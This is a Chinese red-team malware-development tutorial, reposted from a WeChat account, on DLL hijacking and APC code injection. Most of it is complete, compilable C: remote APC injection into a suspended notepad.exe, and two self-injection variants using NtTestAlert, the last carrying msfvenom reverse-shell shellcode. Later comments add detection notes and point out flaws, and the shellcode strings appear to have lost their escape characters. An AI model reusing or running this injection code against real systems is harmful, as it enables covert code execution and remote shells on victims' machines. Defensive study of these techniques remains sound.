03-劫持
01-DLL劫持
首先要了解DLL加载顺序
主要的几个位置:
1-应用程序安装目录
2-C:\Windows\System32
3-C:\Windows\System
4-C:\Windows
5-当前工作目录
6-PATH环境变量目录(系统PATH、用户PATH)
使用 Process Monitor 设置监测选项
替换 DLL 实现劫持;可能需要在 Win7 x64 机器上测试,在 Win10 下没有成功。
02-APC注入
过程:创建一个白进程并使其暂停,使用 VirtualAllocEx 在白进程内开辟内存空间,将 shellcode 写入开辟的内存,把该内存地址加入线程的 APC 队列,恢复线程运行后,APC 队列里的代码就会执行:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
// Payload in bytes, messagebox (label taken from the page; the bytes are
// opaque position-independent code whose behaviour cannot be verified from
// this source).
// NOTE(review): treat like any untrusted binary blob -- a defender would
// hash it and run it in an instrumented sandbox rather than trust the label.
unsigned char myPayload[] =
"x48x31xc9x48x81xe9xdcxffxffxffx48x8dx05xefxff"
"xffxffx48xbbxd6x50xe0xd0x82x17x05xe9x48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x2ax18x61x34x72xe8"
"xfax16x3ex80xe0xd0x82x56x54xa8x86x02xb1x86xca"
"x26xd7x8cx9exdbxb2xb0xbcx5fx8exbbxcex6exa8x5b"
"xd0x37x3bxa1x5dx22xb0xeexcax18xb2xa3x9cx1dxd1"
"x19xcax26xc5x45xeax31x9cxd2xaex37x44x28x1fx5d"
"xa1xd1x43xf5xe8xbbx97x01xdex98x09x45x25xd7x5d"
"x12xdcx98x83xc7x3bx62x56xd8xe0xd0x82x5fx80x29"
"xa2x3fxa8xd1x52x47x3bx62x9ex48xdex94x09x57x25"
"xa0xd7x80x03x8cxcaxe8xccxd7x97xdbxd4x58xcax16"
"xd3xa4xe7x99xa8xe1x42xbbx44x28x1fx5dxa1xd1x43"
"x2fxe5x9cx27x6exacxd3xcex33x0dxacxefx81x95x06"
"xdax29x41x62x96x74xa9xd1x52x71x3bxa8x5dx5cxa8"
"xeexc6x9cx45xf5x9fx51x30xeexc3x9cx01x61x9ex51"
"x30x91xdax56x5dxb7x8fx0axa1x88xc3x4ex44xb3x9e"
"xd3x0cxf0xc3x45xfax09x8ex11xb9x8axbcx5fx8exfb"
"x3fx19x1fx2fx7dx4ax4cx2ex17x50xe0xd0x82x29x4d"
"x64x43xaexe0xd0x82x29x49x64x53x5axe1xd0x82x5f"
"x34x20x97xeaxa5x53xd4x10xfax3cx9ex61x29x91x38"
"xe7xb0x4bx80xafx35x98xe7x7bx69x86xf6x27x8fxa2"
"xeex73x05xd4x88x7excex8exbfx17x05xe9";
/*
 * Demonstrates the sequence the text describes: start a benign host
 * process suspended, place bytes in it, queue them as an APC on its
 * initial thread, then resume it.
 *
 * Every Win32 call below ignores its return value, so a failure at any
 * step (CreateProcessA returning FALSE, VirtualAllocEx returning NULL)
 * goes unnoticed and the later calls operate on invalid handles or a
 * NULL address.
 *
 * Detection note: process creation with CREATE_SUSPENDED followed by a
 * remote PAGE_EXECUTE_READWRITE allocation, WriteProcessMemory and
 * QueueUserAPC before the first ResumeThread is a well-known pattern
 * that endpoint telemetry (ETW/Sysmon-style process and memory events,
 * EDR behavioural rules) keys on.
 */
int main() {
// Create a 64-bit process:
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
LPVOID myPayloadMem;
SIZE_T myPayloadLen = sizeof(myPayload);
LPCWSTR cmd;   // declared but never used in this listing
HANDLE processHandle, threadHandle;
NTSTATUS status;   // declared but never used in this listing
ZeroMemory(&startupInfo, sizeof(startupInfo));
ZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
// The host is created suspended, so its initial thread has not run yet.
CreateProcessA(
"C:\Windows\System32\notepad.exe",
NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInfo
);
// Allow time to start/initialize.
// A process handle is signalled only when the process exits; with the
// target suspended this wait appears to run to its 50000 ms timeout
// rather than returning early.
WaitForSingleObject(processInfo.hProcess, 50000);
processHandle = processInfo.hProcess;
threadHandle = processInfo.hThread;
// Allocate memory for payload
// A private RWX region in another process is one of the strongest
// memory-scan signals available to defenders.
myPayloadMem = VirtualAllocEx(processHandle, NULL, myPayloadLen,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Write payload to allocated memory
WriteProcessMemory(processHandle, myPayloadMem, myPayload, myPayloadLen, NULL);
// Inject into the suspended thread.
// A user-mode APC runs when the thread next becomes alertable; the text
// relies on the resumed initial thread reaching that state during
// start-up -- NOTE(review): confirm on the target OS build.
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)myPayloadMem;
QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, (ULONG_PTR)NULL);
// Resume the suspended thread
ResumeThread(threadHandle);
// processInfo.hProcess / hThread are never closed (CloseHandle);
// harmless only because the program exits immediately.
return 0;
}
编译
x86_64-w64-mingw32-gcc apc-inject.c -o apc-inject.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
在windows10上运行
apc-inject.exe 运行后会退出;弹窗是阻塞形式的,取消弹窗后记事本退出。
使用 NtTestAlert 进行 APC 注入:在本进程的 APC 队列中加入 shellcode 后,调用 NtTestAlert 执行。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ntdll")
// Function-pointer type for ntdll's NtTestAlert (a `using` alias is C++
// syntax, which is why this listing is built with g++ rather than gcc).
// NTAPI is the native calling-convention macro from <windows.h>.
using NtTestAlertFunction = NTSTATUS(NTAPI*)();
// Opaque machine-code bytes; the page does not say what they do. The
// trailing bytes decode to the ASCII strings "Meow-meow!" and "=^..^=",
// and the text expects a pop-up, so presumably a message-box payload --
// unverified. NOTE(review): treat as untrusted binary content; defenders
// would hash it and detonate it in a sandbox rather than read it.
unsigned char shellcode[] = {
0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0,
0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2,
0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52,
0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6,
0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41,
0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x3e,
0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d,
0x85, 0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
0x56, 0x7, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2,
0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d, 0x65, 0x6f, 0x77,
0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
};
/*
 * Self-injection variant: the bytes are placed in the current process
 * and queued as an APC on the current thread; NtTestAlert then delivers
 * the thread's pending user-mode APCs, which is what runs the routine.
 *
 * Return values are unchecked: GetModuleHandleA, GetProcAddress and
 * VirtualAlloc can all return NULL, in which case testAlert() becomes a
 * call through a NULL pointer. argc/argv are unused.
 *
 * Detection note: resolving NtTestAlert by name, an RWX VirtualAlloc in
 * the caller's own process and QueueUserAPC on GetCurrentThread() are
 * each ordinary on their own but together form a sequence behavioural
 * rules can match; the region is also left RWX (no VirtualProtect).
 */
int main(int argc, char* argv[]) {
SIZE_T shellcodeSize = sizeof(shellcode);
// NtTestAlert is an undocumented ntdll export, hence the run-time lookup.
HMODULE ntdllModule = GetModuleHandleA("ntdll");
NtTestAlertFunction testAlert = (NtTestAlertFunction)(GetProcAddress(ntdllModule, "NtTestAlert"));
LPVOID shellcodeMemory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Writing into the calling process via WriteProcessMemory is equivalent to
// a plain memcpy; presumably kept to mirror the remote-injection API sequence.
WriteProcessMemory(GetCurrentProcess(), shellcodeMemory, shellcode, shellcodeSize, NULL);
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellcodeMemory;
QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);
// Forces delivery of the APC queued above on this thread.
testAlert();
return 0;
}
编译
x86_64-w64-mingw32-g++ apc-inject2.c -o apc-inject2.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
在 Windows 10 上运行时没有弹窗;原理没有问题,但弹窗似乎没有执行起来,换成反弹 shell 的 shellcode 就可以。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ntdll")
// Function-pointer type for ntdll's NtTestAlert. A `using` alias is C++
// syntax, so this listing also needs a C++ compiler (no build line is
// given for it on the page). NTAPI is the calling-convention macro from <windows.h>.
using NtTestAlertFunction = NTSTATUS(NTAPI*)();
//msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f c
// Opaque machine-code bytes; per the generator line above this is a
// reverse-TCP shell payload pointed at loopback (127.0.0.1:4444).
// NOTE(review): nothing here can be verified from source -- treat as
// untrusted binary content. From a defender's side, the observable is
// the outbound TCP connection from an unexpected process, which is what
// network and EDR telemetry would key on.
unsigned char shellcode[] =
"xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50"
"x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52"
"x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4a"
"x4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41"
"xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52"
"x20x8bx42x3cx48x01xd0x8bx80x88x00x00x00x48"
"x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40"
"x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48"
"x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41"
"x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1"
"x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0c"
"x48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01"
"xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5a"
"x48x83xecx20x41x52xffxe0x58x41x59x5ax48x8b"
"x12xe9x57xffxffxffx5dx49xbex77x73x32x5fx33"
"x32x00x00x41x56x49x89xe6x48x81xecxa0x01x00"
"x00x49x89xe5x49xbcx02x00x11x5cx7fx00x00x01"
"x41x54x49x89xe4x4cx89xf1x41xbax4cx77x26x07"
"xffxd5x4cx89xeax68x01x01x00x00x59x41xbax29"
"x80x6bx00xffxd5x50x50x4dx31xc9x4dx31xc0x48"
"xffxc0x48x89xc2x48xffxc0x48x89xc1x41xbaxea"
"x0fxdfxe0xffxd5x48x89xc7x6ax10x41x58x4cx89"
"xe2x48x89xf9x41xbax99xa5x74x61xffxd5x48x81"
"xc4x40x02x00x00x49xb8x63x6dx64x00x00x00x00"
"x00x41x50x41x50x48x89xe2x57x57x57x4dx31xc0"
"x6ax0dx59x41x50xe2xfcx66xc7x44x24x54x01x01"
"x48x8dx44x24x18xc6x00x68x48x89xe6x56x50x41"
"x50x41x50x41x50x49xffxc0x41x50x49xffxc8x4d"
"x89xc1x4cx89xc1x41xbax79xccx3fx86xffxd5x48"
"x31xd2x48xffxcax8bx0ex41xbax08x87x1dx60xff"
"xd5xbbxf0xb5xa2x56x41xbaxa6x95xbdx9dxffxd5"
"x48x83xc4x28x3cx06x7cx0ax80xfbxe0x75x05xbb"
"x47x13x72x6fx6ax00x59x41x89xdaxffxd5";
/*
 * Same self-injection sequence as the previous listing, with a different
 * byte blob: bytes are copied into an RWX region of the current process,
 * queued as an APC on the current thread, and NtTestAlert delivers the
 * thread's pending user-mode APCs.
 *
 * Return values are unchecked: GetModuleHandleA, GetProcAddress and
 * VirtualAlloc can all return NULL, in which case testAlert() becomes a
 * call through a NULL pointer. argc/argv are unused.
 *
 * Detection note: the same host-based signals as before (RWX VirtualAlloc,
 * QueueUserAPC on the current thread, NtTestAlert resolved by name) plus,
 * for this payload, an outbound TCP connection from the process.
 */
int main(int argc, char* argv[]) {
SIZE_T shellcodeSize = sizeof(shellcode);
// NtTestAlert is an undocumented ntdll export, hence the run-time lookup.
HMODULE ntdllModule = GetModuleHandleA("ntdll");
NtTestAlertFunction testAlert = (NtTestAlertFunction)(GetProcAddress(ntdllModule, "NtTestAlert"));
LPVOID shellcodeMemory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Writing into the calling process via WriteProcessMemory is equivalent to
// a plain memcpy; presumably kept to mirror the remote-injection API sequence.
WriteProcessMemory(GetCurrentProcess(), shellcodeMemory, shellcode, shellcodeSize, NULL);
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellcodeMemory;
QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);
// Forces delivery of the APC queued above on this thread.
testAlert();
return 0;
}
原文始发于微信公众号(高级红队专家):【MalDev-03】劫持基础及实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。